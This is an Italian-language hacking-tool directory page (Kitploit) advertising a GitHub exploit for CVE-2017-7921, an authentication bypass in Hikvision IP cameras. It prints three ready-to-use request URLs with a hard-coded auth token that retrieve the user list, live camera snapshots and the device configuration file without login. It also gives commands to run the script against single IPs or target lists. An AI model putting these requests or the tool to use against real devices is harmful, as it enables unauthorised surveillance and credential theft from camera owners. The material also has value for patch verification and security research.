Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2017-7921-EXP — Exploit per CVE-2017-7921 che prende di mira dispositivi Hikvision con autenticazione impropria. Recupera elenchi di utenti, istantanee della telecamera e file di configurazione tramite richieste HTTP appositamente create. | Kitploit
Strumenti/GitHubGitHub/inj3ction/cve-2017-7921-exp
Escalation di PrivilegiSicurezza IoTAnalisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebRaccolta Informazioni
GitHubinj3ction/cve-2017-7921-exp

CVE-2017-7921-EXP

Exploit per CVE-2017-7921 che prende di mira dispositivi Hikvision con autenticazione impropria. Recupera elenchi di utenti, istantanee della telecamera e file di configurazione tramite richieste HTTP appositamente create.

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi
Vedi Repository
3 anni faNon ancora revisionato

Exploit CVE-2017-7921

Un problema di autenticazione impropria è stato scoperto nei dispositivi Hikvision.

​ La vulnerabilità di autenticazione impropria si verifica quando un'applicazione non autentica gli utenti in modo adeguato o corretto.

​ Ciò può permettere a un utente malintenzionato di elevare i propri privilegi sul sistema e ottenere accesso a informazioni sensibili.

root@kitploit:~
       # inj3ction

​ https://seclists.org/fulldisclosure/2017/Sep/23

​ Dettagli della vulnerabilità:

​ ----------------------

​ Recupera un elenco di tutti gli utenti e dei loro ruoli:

​ http://camera.ip/Security/users?auth=YWRtaW46MTEK

​ Ottieni un'istantanea della fotocamera senza autenticazione:

​ http://camera.ip/onvif-http/snapshot?auth=YWRtaW46MTEK

​ E, peggio di tutto, è possibile scaricare la configurazione della fotocamera:

​ http://camera.ip/System/configurationFile?auth=YWRtaW46MTEK

Installa le dipendenze

root@kitploit:~
python3 -m pip install -r requirements.txt

Utilizzo

root@kitploit:~
python3 CVE_2017_7921_EXP.py -t xxx.xx.xx.xx run
python3 CVE_2017_7921_EXP.py -t ./targets.txt run

Screenshot

Scarica lo strumento